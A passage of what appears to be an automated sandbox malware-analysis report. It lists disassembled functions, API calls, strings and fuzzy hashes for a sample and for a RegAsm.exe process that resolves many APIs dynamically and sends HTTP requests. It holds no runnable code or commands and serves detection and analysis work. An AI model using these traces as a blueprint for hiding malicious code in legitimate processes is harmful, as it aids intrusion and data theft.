Opcode Fuzzy Hash: ce3a38ba7daec6ebfafe31ef39782c99b6c32c171e8a32d05225943d9e52e443
Instruction Fuzzy Hash: 70017879A006209BDB06EF60D88167D7BA2FFDA780F150018E811673A1CF34AE46CBC2

Function 00132080 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00132085

Part of subcall function 001327E7: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001327F3

std::_Xinvalid_argument.LIBCPMT ref: 00132095

Strings

vector too long, xrefs: 00132090
string too long, xrefs: 00132080

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 3649684471-1617939282
Opcode ID: a699e59de53a9f253876eccd5cc240a68c0c81d88d321f2d763a7639e83b8e4f
Instruction ID: ba725bfcb2b6ec49c0c071ae28f4edf0acf6c0e06fc3d91f54fb76adad80e0e4
Opcode Fuzzy Hash: a699e59de53a9f253876eccd5cc240a68c0c81d88d321f2d763a7639e83b8e4f
Instruction Fuzzy Hash: F5F0F632B006165BC211BF6CEC8088AF7E8FB55740F040576F94897202E771A959C7F2

Function 00132D72 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00132D79
std::_Lockit::_Lockit.LIBCPMT ref: 00132D86
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00132DC3

Part of subcall function 0013482E: _Yarn.LIBCPMT ref: 0013484D
Part of subcall function 0013482E: _Yarn.LIBCPMT ref: 00134871

Strings

bad locale name, xrefs: 00132DD4

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: c483039b6a027557ca16df464ecc241430c32b7e9acbccf607784b05222b1ffc
Instruction ID: e9b113a81f2862181108708a0f2a33cdbba09108044f25757ccdd090032423c1
Opcode Fuzzy Hash: c483039b6a027557ca16df464ecc241430c32b7e9acbccf607784b05222b1ffc
Instruction Fuzzy Hash: 09018071501B54AFC7209FAA944154BFFE0BF29750B80896FF18DD3A11D770E504CB99

Function 00139522 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,001394D3,00000000,00000001,0018BC0C,?,?,?,00139676,00000004,InitializeCriticalSectionEx,0014FD70,InitializeCriticalSectionEx), ref: 0013952F
GetLastError.KERNEL32(?,001394D3,00000000,00000001,0018BC0C,?,?,?,00139676,00000004,InitializeCriticalSectionEx,0014FD70,InitializeCriticalSectionEx,00000000,?,0013942D), ref: 00139539
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00138343), ref: 00139561

Strings

api-ms-, xrefs: 00139546

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b5a3f0353b9629f12d88040cc351c6e72aa4d2099e708ad3c5ff5bb3073941e7
Instruction ID: f36afce812d09076dc4516984161224e2e39f07e5a7ea5630f350b7d1e3833cd
Opcode Fuzzy Hash: b5a3f0353b9629f12d88040cc351c6e72aa4d2099e708ad3c5ff5bb3073941e7
Instruction Fuzzy Hash: F9E01A75B84209BAEF111FA1EC46B193A99BB02B50F204065F91CA84F1D7E1D99185D5

Function 00141D91 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E05CB022,00000000,00000000,0013B0B8), ref: 00141DF4

Part of subcall function 00144A07: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00143E3B,?,00000000,-00000008), ref: 00144AB3

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0014204F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00142097
GetLastError.KERNEL32 ref: 0014213A

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: df46bb99f89c2c00739f691040689aa86fe13457451243590991194a172b2e5e
Instruction ID: c28ddc6e0db0ebca7e3a750a85befa1dfdebe65e0280bc53b1cbaebebf9640b4
Opcode Fuzzy Hash: df46bb99f89c2c00739f691040689aa86fe13457451243590991194a172b2e5e
Instruction Fuzzy Hash: 0DD16AB5D00248AFCB15CFA8C880AADBBF5FF19310F58412AF965E7361D730A986CB50

Function 001384F1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 001385B8
___AdjustPointer.LIBCMT ref: 001385DB
___AdjustPointer.LIBCMT ref: 00138677

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f5053bfd972763704d7592b3c8fcf457712a6c975e43a8d2bf5072f7858adddf
Instruction ID: 6ffe2bf699ad29edc3260f0c19821c96ad3d14a13aa75fe06ee088ed644bd58c
Opcode Fuzzy Hash: f5053bfd972763704d7592b3c8fcf457712a6c975e43a8d2bf5072f7858adddf
Instruction Fuzzy Hash: BC51CFB2600706AFDB299F54D842BBAB7A4FF94710F24442DF815972A1EB31ED81CB90

Function 00144E23 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00144A07: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00143E3B,?,00000000,-00000008), ref: 00144AB3

GetLastError.KERNEL32 ref: 00144E87
__dosmaperr.LIBCMT ref: 00144E8E
GetLastError.KERNEL32(?,?,?,?), ref: 00144EC8
__dosmaperr.LIBCMT ref: 00144ECF

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 8641344ca2b5227f8c9c48a856fabf3bb3846b48d7c618eff0241549d7931a04
Instruction ID: 22bbc86929612995653182a06df4ca969d5847fa5247c25a121cdbb9e6fbb797
Opcode Fuzzy Hash: 8641344ca2b5227f8c9c48a856fabf3bb3846b48d7c618eff0241549d7931a04
Instruction Fuzzy Hash: 60210876600215AFDB20EFB5CC81A6BB7A9FF10374B118429F829B7161D735EC5087E0

Function 0013CC84 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4117759d89531f79ed1e46d9604726614715cae4fc52015099df84490bcd91
Instruction ID: 3b50d2645d228eae6dbd0f8e620f512d54f1991d9e1df4a1db3d9660b912087b
Opcode Fuzzy Hash: ac4117759d89531f79ed1e46d9604726614715cae4fc52015099df84490bcd91
Instruction Fuzzy Hash: A621A271604206AFDB20AFB9DC8096BBBA9EF10364F118535F969FB251DB31EC5087E0

Function 00145E3A Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00145E42

Part of subcall function 00144A07: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00143E3B,?,00000000,-00000008), ref: 00144AB3

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00145E7A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00145E9A

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 2bb699c3aff8ea0215e0f57605d22ba7bdfe2608d2cf1fc60de6f00071f3c583
Instruction ID: 4d2add47b9076012f9edb11d159e355455c90d6c32e34d8ce7e1b40462bcdcaa
Opcode Fuzzy Hash: 2bb699c3aff8ea0215e0f57605d22ba7bdfe2608d2cf1fc60de6f00071f3c583
Instruction Fuzzy Hash: BE1126F5500A1A7FA72227769C89D7FA99EEF597D87200524F901E2122FB30CE0182B1

Function 0014ABDB Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00149A76,00000000,00000001,00000000,0013B0B8,?,0014218E,0013B0B8,00000000,00000000), ref: 0014ABF2
GetLastError.KERNEL32(?,00149A76,00000000,00000001,00000000,0013B0B8,?,0014218E,0013B0B8,00000000,00000000,0013B0B8,0013B0B8,?,00142715,?), ref: 0014ABFE

Part of subcall function 0014ABC4: CloseHandle.KERNEL32(FFFFFFFE,0014AC0E,?,00149A76,00000000,00000001,00000000,0013B0B8,?,0014218E,0013B0B8,00000000,00000000,0013B0B8,0013B0B8), ref: 0014ABD4

___initconout.LIBCMT ref: 0014AC0E

Part of subcall function 0014AB86: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0014ABB5,00149A63,0013B0B8,?,0014218E,0013B0B8,00000000,00000000,0013B0B8), ref: 0014AB99

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00149A76,00000000,00000001,00000000,0013B0B8,?,0014218E,0013B0B8,00000000,00000000,0013B0B8), ref: 0014AC23

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 983a31ac83001f7e03d3e77610cdd59ee9bed6da408ea6184c91b7b6592a7fe4
Instruction ID: 8aa3d1f9fe534433f21667e822c04baaf8c009278918ddd42f84a8d522870ae5
Opcode Fuzzy Hash: 983a31ac83001f7e03d3e77610cdd59ee9bed6da408ea6184c91b7b6592a7fe4
Instruction Fuzzy Hash: 1AF03036940124BBCF222FA5DC08D8D3F66FF197A0B468451FE1885530C73289609B92

Function 00138AED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00138B12

Strings

MOC, xrefs: 00138B24
RCC, xrefs: 00138B2C

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 7885ecbad8e0f054042401001d4820d6b66b52641e8a1a830d7f8bb2a99a7f10
Instruction ID: 62f36ab63948cf07ddaf5b4d70d102447d67d21bc6a8e89fda71f28fe4ede295
Opcode Fuzzy Hash: 7885ecbad8e0f054042401001d4820d6b66b52641e8a1a830d7f8bb2a99a7f10
Instruction Fuzzy Hash: B1413772A00209EFCF15DF98CD81AEEBBB5FF48304F188059FA04A7265DB359951DB61

Function 00132090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00132095

Part of subcall function 001327E7: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001327F3

Strings

ios_base::badbit set, xrefs: 00132232, 0013225D
vector too long, xrefs: 00132090

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: ios_base::badbit set$vector too long
API String ID: 1997705970-2265760553
Opcode ID: b8ccd75b6fada6734b04499ed27a22eb9fc55ed014ef9cccfc6cdada47371f83
Instruction ID: 17bc4ac03acebf3553930c0d38c4f1e2dbe9a0209615548988e1f57f8609f74e
Opcode Fuzzy Hash: b8ccd75b6fada6734b04499ed27a22eb9fc55ed014ef9cccfc6cdada47371f83
Instruction Fuzzy Hash:

Analysis Process: RegAsm.exePID: 3264, Parent PID: 6708COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	11.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	35

Executed Functions

Function 00417645 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
GetProcAddress.KERNEL32 ref: 00417670
GetProcAddress.KERNEL32 ref: 00417687
GetProcAddress.KERNEL32 ref: 0041769E
GetProcAddress.KERNEL32 ref: 004176B5
GetProcAddress.KERNEL32 ref: 004176CC
GetProcAddress.KERNEL32 ref: 004176E3
GetProcAddress.KERNEL32 ref: 004176FA
GetProcAddress.KERNEL32 ref: 00417711
GetProcAddress.KERNEL32 ref: 00417728
GetProcAddress.KERNEL32 ref: 0041773F
GetProcAddress.KERNEL32 ref: 00417756
GetProcAddress.KERNEL32 ref: 0041776D
GetProcAddress.KERNEL32 ref: 00417784
GetProcAddress.KERNEL32 ref: 0041779B
GetProcAddress.KERNEL32 ref: 004177B2
GetProcAddress.KERNEL32 ref: 004177C9
GetProcAddress.KERNEL32 ref: 004177E0
GetProcAddress.KERNEL32 ref: 004177F7
GetProcAddress.KERNEL32 ref: 0041780E
GetProcAddress.KERNEL32 ref: 00417825
GetProcAddress.KERNEL32 ref: 0041783C
GetProcAddress.KERNEL32 ref: 00417853
GetProcAddress.KERNEL32 ref: 0041786A
GetProcAddress.KERNEL32 ref: 00417881
GetProcAddress.KERNEL32 ref: 00417898
GetProcAddress.KERNEL32 ref: 004178AF
GetProcAddress.KERNEL32 ref: 004178C6
GetProcAddress.KERNEL32 ref: 004178DD
GetProcAddress.KERNEL32 ref: 004178F4
GetProcAddress.KERNEL32 ref: 0041790B
GetProcAddress.KERNEL32 ref: 00417922
GetProcAddress.KERNEL32 ref: 00417939
GetProcAddress.KERNEL32 ref: 00417950
GetProcAddress.KERNEL32 ref: 00417967
GetProcAddress.KERNEL32 ref: 0041797E
GetProcAddress.KERNEL32 ref: 00417995
GetProcAddress.KERNEL32 ref: 004179AC
GetProcAddress.KERNEL32 ref: 004179C3
GetProcAddress.KERNEL32 ref: 004179DA
GetProcAddress.KERNEL32 ref: 004179F1
GetProcAddress.KERNEL32 ref: 00417A08
GetProcAddress.KERNEL32 ref: 00417A1F
LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
LoadLibraryA.KERNEL32 ref: 00417A41
LoadLibraryA.KERNEL32 ref: 00417A52
LoadLibraryA.KERNEL32 ref: 00417A63
LoadLibraryA.KERNEL32 ref: 00417A74
LoadLibraryA.KERNEL32 ref: 00417A85
LoadLibraryA.KERNEL32 ref: 00417A96
LoadLibraryA.KERNEL32 ref: 00417AA7
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
GetProcAddress.KERNEL32(75290000), ref: 00417AD2
GetProcAddress.KERNEL32 ref: 00417AE9
GetProcAddress.KERNEL32 ref: 00417B00
GetProcAddress.KERNEL32 ref: 00417B17
GetProcAddress.KERNEL32 ref: 00417B2E
GetProcAddress.KERNEL32(73B50000), ref: 00417B4D
GetProcAddress.KERNEL32 ref: 00417B64
GetProcAddress.KERNEL32 ref: 00417B7B
GetProcAddress.KERNEL32 ref: 00417B92
GetProcAddress.KERNEL32 ref: 00417BA9
GetProcAddress.KERNEL32 ref: 00417BC0
GetProcAddress.KERNEL32 ref: 00417BD7
GetProcAddress.KERNEL32 ref: 00417BEE
GetProcAddress.KERNEL32(752C0000), ref: 00417C09
GetProcAddress.KERNEL32 ref: 00417C20
GetProcAddress.KERNEL32 ref: 00417C37
GetProcAddress.KERNEL32 ref: 00417C4E
GetProcAddress.KERNEL32 ref: 00417C65
GetProcAddress.KERNEL32(74EC0000), ref: 00417C84
GetProcAddress.KERNEL32 ref: 00417C9B
GetProcAddress.KERNEL32 ref: 00417CB2
GetProcAddress.KERNEL32 ref: 00417CC9
GetProcAddress.KERNEL32 ref: 00417CE0
GetProcAddress.KERNEL32 ref: 00417CF7
GetProcAddress.KERNEL32(75BD0000), ref: 00417D16
GetProcAddress.KERNEL32 ref: 00417D2D
GetProcAddress.KERNEL32 ref: 00417D44
GetProcAddress.KERNEL32 ref: 00417D5B
GetProcAddress.KERNEL32 ref: 00417D72
GetProcAddress.KERNEL32 ref: 00417D89
GetProcAddress.KERNEL32 ref: 00417DA0
GetProcAddress.KERNEL32 ref: 00417DB7
GetProcAddress.KERNEL32 ref: 00417DCE
GetProcAddress.KERNEL32(75A70000), ref: 00417DE9
GetProcAddress.KERNEL32 ref: 00417E00
GetProcAddress.KERNEL32 ref: 00417E17
GetProcAddress.KERNEL32 ref: 00417E2E
GetProcAddress.KERNEL32 ref: 00417E45
GetProcAddress.KERNEL32(75450000), ref: 00417E60
GetProcAddress.KERNEL32 ref: 00417E77
GetProcAddress.KERNEL32(75DA0000), ref: 00417E92
GetProcAddress.KERNEL32 ref: 00417EA9
GetProcAddress.KERNEL32(6F090000), ref: 00417EC8
GetProcAddress.KERNEL32 ref: 00417EDF
GetProcAddress.KERNEL32 ref: 00417EF6
GetProcAddress.KERNEL32 ref: 00417F0D
GetProcAddress.KERNEL32 ref: 00417F24
GetProcAddress.KERNEL32 ref: 00417F3B
GetProcAddress.KERNEL32 ref: 00417F52
GetProcAddress.KERNEL32 ref: 00417F69
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
GetProcAddress.KERNEL32(75AF0000), ref: 00417FB0
GetProcAddress.KERNEL32 ref: 00417FC7
GetProcAddress.KERNEL32 ref: 00417FDE
GetProcAddress.KERNEL32 ref: 00417FF5
GetProcAddress.KERNEL32(75D90000), ref: 00418010
GetProcAddress.KERNEL32(6CD50000), ref: 0041802B
GetProcAddress.KERNEL32 ref: 00418042
GetProcAddress.KERNEL32 ref: 00418059
GetProcAddress.KERNEL32 ref: 00418070
GetProcAddress.KERNEL32(6CB60000,SymMatchString), ref: 0041808A

Strings

dbghelp.dll, xrefs: 00417AAD
HttpQueryInfoA, xrefs: 00417F6F
InternetSetOptionA, xrefs: 00417F85
SymMatchString, xrefs: 00418084

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
Instruction ID: b1e844fb62b820e65f219bf097f7cac9561447c547020423e5517cd844e2ca6b
Opcode Fuzzy Hash: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
Instruction Fuzzy Hash: 3D42D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54

Function 0040514C Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00405151

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 004057CC
lstrlenA.KERNEL32(00000000), ref: 004057DD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
HeapAlloc.KERNEL32(00000000), ref: 004057EE
lstrlenA.KERNEL32(00000000), ref: 004057FF
memcpy.MSVCRT ref: 00405810
lstrlenA.KERNEL32(00000000), ref: 00405821
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
memcpy.MSVCRT ref: 00405843
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
InternetCloseHandle.WININET(?), ref: 004058C9
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7

